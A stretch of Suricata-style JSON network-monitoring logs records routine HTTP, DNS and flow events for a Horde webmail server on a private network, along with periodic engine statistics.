{"timestamp":"2020-02-29T00:03:44.000397+0000","event_type":"stats","stats":{"uptime":13876,"capture":{"kernel_packets":132957,"kernel_drops":0},"decoder":{"pkts":132959,"bytes":92170018,"invalid":180,"ipv4":131526,"ipv6":8,"ethernet":132959,"raw":0,"null":0,"sll":0,"tcp":126496,"udp":4836,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2684,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2700,"synack":2691,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1729,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2204,"failed_udp":108},"tx":{"http":4492,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2281}},"flow_mgr":{"closed_pruned":2663,"new_pruned":15,"est_pruned":2249,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20831,"memcap_state":0,"memcap_global":0},"http":{"memuse":45335,"memcap":0}}} {"timestamp":"2020-02-29T00:03:45.000693+0000","flow_id":667500901523119,"event_type":"flow","src_ip":"192.168.10.130","src_port":34704,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1130,"bytes_toclient":5052,"start":"2020-02-29T00:02:39.024239+0000","end":"2020-02-29T00:02:44.205454+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:47.000253+0000","flow_id":795211738668950,"event_type":"flow","src_ip":"192.168.10.122","src_port":48627,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:44.941974+0000","end":"2020-02-28T23:58:45.053386+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:47.001136+0000","flow_id":139224203776181,"event_type":"flow","src_ip":"192.168.10.122","src_port":55264,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:45.118965+0000","end":"2020-02-28T23:58:45.230467+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:47.001351+0000","flow_id":612061463836783,"event_type":"flow","src_ip":"192.168.10.130","src_port":34706,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":10,"bytes_toserver":1161,"bytes_toclient":7936,"start":"2020-02-29T00:02:41.129135+0000","end":"2020-02-29T00:02:46.724343+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:47.425157+0000","flow_id":106092845825221,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45285,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29425,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:47.531143+0000","flow_id":106092845825221,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45285,"proto":"UDP","dns":{"type":"answer","id":29425,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:47.531143+0000","flow_id":106092845825221,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45285,"proto":"UDP","dns":{"type":"answer","id":29425,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:47.578774+0000","flow_id":1754728927280743,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50}} {"timestamp":"2020-02-29T00:03:47.578774+0000","flow_id":1754728927280743,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:03:47.581795+0000","flow_id":1247342965809315,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48919,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31870,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:47.693010+0000","flow_id":1247342965809315,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48919,"proto":"UDP","dns":{"type":"answer","id":31870,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:47.693010+0000","flow_id":1247342965809315,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48919,"proto":"UDP","dns":{"type":"answer","id":31870,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:47.769072+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8786}} {"timestamp":"2020-02-29T00:03:47.819724+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52672,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8786},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":36714,"tx_id":0}} {"timestamp":"2020-02-29T00:03:47.821266+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/form_sections.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:03:47.828479+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52672,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/form_sections.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/js\/form_sections.js","state":"CLOSED","stored":false,"size":1723,"tx_id":1}} {"timestamp":"2020-02-29T00:03:47.829099+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517}} {"timestamp":"2020-02-29T00:03:47.830450+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52672,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517},"app_proto":"http","fileinfo":{"filename":"\/js\/calendar.js","state":"CLOSED","stored":false,"size":10335,"tx_id":2}} {"timestamp":"2020-02-29T00:03:47.847731+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/calendar.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":973}} {"timestamp":"2020-02-29T00:03:47.849620+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52672,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/calendar.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":973},"app_proto":"http","fileinfo":{"filename":"\/nag\/js\/calendar.js","state":"CLOSED","stored":false,"size":3052,"tx_id":3}} {"timestamp":"2020-02-29T00:03:47.893299+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/task.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":689}} {"timestamp":"2020-02-29T00:03:51.000241+0000","event_type":"stats","stats":{"uptime":13883,"capture":{"kernel_packets":132963,"kernel_drops":0},"decoder":{"pkts":133009,"bytes":92192150,"invalid":180,"ipv4":131576,"ipv6":8,"ethernet":133009,"raw":0,"null":0,"sll":0,"tcp":126542,"udp":4840,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2687,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2703,"synack":2694,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1731,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2206,"failed_udp":108},"tx":{"http":4498,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2283}},"flow_mgr":{"closed_pruned":2666,"new_pruned":15,"est_pruned":2252,"bypassed_pruned":0,"flows_checked":7,"flows_notimeout":7,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65528,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20830,"memcap_state":0,"memcap_global":0},"http":{"memuse":74606,"memcap":0}}} {"timestamp":"2020-02-29T00:03:52.000305+0000","flow_id":1433087412423287,"event_type":"flow","src_ip":"192.168.10.130","src_port":34708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1448,"bytes_toclient":5145,"start":"2020-02-29T00:02:46.215671+0000","end":"2020-02-29T00:02:51.772800+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:52.582941+0000","flow_id":1754728927280743,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34722,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":30,"tx_id":0}} {"timestamp":"2020-02-29T00:03:52.854906+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52672,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/task.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":689},"app_proto":"http","fileinfo":{"filename":"\/nag\/js\/task.js","state":"CLOSED","stored":false,"size":1698,"tx_id":4}} {"timestamp":"2020-02-29T00:03:58.000296+0000","event_type":"stats","stats":{"uptime":13890,"capture":{"kernel_packets":133011,"kernel_drops":0},"decoder":{"pkts":133021,"bytes":92192846,"invalid":180,"ipv4":131584,"ipv6":8,"ethernet":133021,"raw":0,"null":0,"sll":0,"tcp":126550,"udp":4840,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2687,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2703,"synack":2694,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1731,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2206,"failed_udp":108},"tx":{"http":4498,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2283}},"flow_mgr":{"closed_pruned":2667,"new_pruned":15,"est_pruned":2252,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20830,"memcap_state":0,"memcap_global":0},"http":{"memuse":22938,"memcap":0}}} {"timestamp":"2020-02-29T00:03:59.357530+0000","flow_id":158826455069850,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42601,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61359,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:59.469367+0000","flow_id":158826455069850,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42601,"proto":"UDP","dns":{"type":"answer","id":61359,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:59.469367+0000","flow_id":158826455069850,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42601,"proto":"UDP","dns":{"type":"answer","id":61359,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:59.641684+0000","flow_id":223959634101441,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6896}} {"timestamp":"2020-02-29T00:04:00.084792+0000","flow_id":1832429181487928,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47014,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62022,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:00.190190+0000","flow_id":1832429181487928,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47014,"proto":"UDP","dns":{"type":"answer","id":62022,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:00.190190+0000","flow_id":1832429181487928,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47014,"proto":"UDP","dns":{"type":"answer","id":62022,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:00.211063+0000","flow_id":290368418484945,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52680,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:04:00.211063+0000","flow_id":290368418484945,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52680,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":11,"tx_id":0}} {"timestamp":"2020-02-29T00:04:02.000622+0000","flow_id":946128316031874,"event_type":"flow","src_ip":"192.168.10.130","src_port":34714,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1037,"bytes_toclient":4130,"start":"2020-02-29T00:02:56.680834+0000","end":"2020-02-29T00:03:01.884783+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:03.000848+0000","flow_id":835593022375949,"event_type":"flow","src_ip":"192.168.10.122","src_port":51967,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:02.231437+0000","end":"2020-02-28T23:59:02.339962+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:04.646765+0000","flow_id":223959634101441,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6896},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35873,"tx_id":0}} {"timestamp":"2020-02-29T00:04:05.000201+0000","event_type":"stats","stats":{"uptime":13897,"capture":{"kernel_packets":133045,"kernel_drops":0},"decoder":{"pkts":133051,"bytes":92203990,"invalid":180,"ipv4":131614,"ipv6":8,"ethernet":133051,"raw":0,"null":0,"sll":0,"tcp":126576,"udp":4844,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2689,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2705,"synack":2696,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1733,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2208,"failed_udp":108},"tx":{"http":4500,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2285}},"flow_mgr":{"closed_pruned":2668,"new_pruned":15,"est_pruned":2252,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21160,"memcap_state":0,"memcap_global":0},"http":{"memuse":108597,"memcap":0}}} {"timestamp":"2020-02-29T00:04:05.216190+0000","flow_id":290368418484945,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52680,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:04:06.676109+0000","flow_id":1073078963949837,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49816,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32616,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:06.787475+0000","flow_id":1073078963949837,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49816,"proto":"UDP","dns":{"type":"answer","id":32616,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 